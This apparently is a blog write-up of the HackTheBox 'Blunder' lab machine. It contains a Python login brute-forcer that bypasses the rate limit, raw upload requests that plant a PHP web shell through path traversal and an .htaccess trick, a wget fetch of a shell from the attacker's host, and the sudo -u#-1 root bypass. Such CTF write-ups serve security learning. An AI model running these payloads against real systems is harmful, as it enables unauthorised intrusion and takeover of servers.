Blunder: HackTheBox

  • Directory busting to get the admin portal and todo.txt file.
  • Brute force password.
  • Exploit the file upload vulnerability to get the shell.
  • Enumerate the machine to escalate privilege.
  • Find exploits to bypass the restricted ability.

Nmap

# nmap -T4 -p- -A -o nmap 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http
Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
-T4 : 4 threads
-p- : scan all the ports
-A : OS detection, version detection, traceroute
-o : Output scan result if file

Port 80

Directory busting

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.191 -x php,txt -o dirs
/about (Status: 200)
/0 (Status: 200)
/admin (Status: 301)
/install.php (Status: 200)
/empty (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)
/LICENSE (Status: 200)
-w : wordlist
-u : URL
-x : File extension to search for
-o : Output file to write results
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
$ cewl -w ro.txt http://10.10.10.191
#!/usr/bin/env python3
import re
import requests
host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'
wordlist = []
# Generate 50 incorrect passwords
#for i in range(50):
# wordlist.append('Password{i}'.format(i = i))
# Add the correct password to the end of the list
#wordlist.append('adminadmin')
f=open("wordlists")
for data in f.readlines():
wordlist.append(data.strip())
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
fergus : RolandDeschain
http://10.10.10.191/admin/about
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 27550
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="bear.jpg"
Content-Type: image/jpeg
//imagedata
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
7f974f44bd782ce95b7822da7bfea72a
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
http://10.10.10.191/bl-content/uploads/pages/uuid-value
http://10.10.10.191/bl-content/tmp/temp/
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="evil.jpg"
Content-Type: image/jpeg
<?php system($_GET['cmd'])'?>
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:00:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 63
Connection: close
Content-Type: application/json
{"status":0,"message":"Images uploaded.","images":["evil.jpg"]}
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg
RewriteEngine Off
AddType application/x-httpd-php .jpg

------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:06:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 92
Connection: close
Content-Type: application/json
{"status":1,"message":"File type is not supported. Allowed types: gif, png, jpg, jpeg, svg"}
http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=whoamiwww-data
http://10.10.10.191/bl-content/tmp/uploaded-php-file

Getting Shell

http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=wget%2010.10.14.192:8000/sh.php
drwxr-xr-x  5 root     root     4096 Nov 28  2019 .
drwxr-xr-x 15 root root 4096 Nov 27 2019 ..
drwxr-xr-x 8 www-data www-data 4096 May 19 15:13 bludit-3.10.0a
drwxrwxr-x 8 www-data www-data 4096 Apr 28 12:18 bludit-3.9.2
drwxr-xr-x 2 root root 4096 Nov 28 2019 html
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
$ su hugo
Password : Password123
$ /bin/bash
hugo@blunder:~$ wc user.txt
1 1 33 user.txt

Root

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo#

--

--

--

Infosec Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Privacy- A Myth ft. Social Media

The Future of Warfare

Evanesco Monthly Report (2022 Feb)

The World’s First Non-Cuttable Material

Coordicide update — Autopeering: Part 2

The 360 degree database

Cybersecurity is the Next Critical Step for IoT

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Roshan Guragain

Roshan Guragain

Infosec Enthusiast

More from Medium

AZS — 2022 Roadmap

How we’re moving forward as a project…

NEAR Bootcamp Summary

rTAU Tokenomics and Merge Information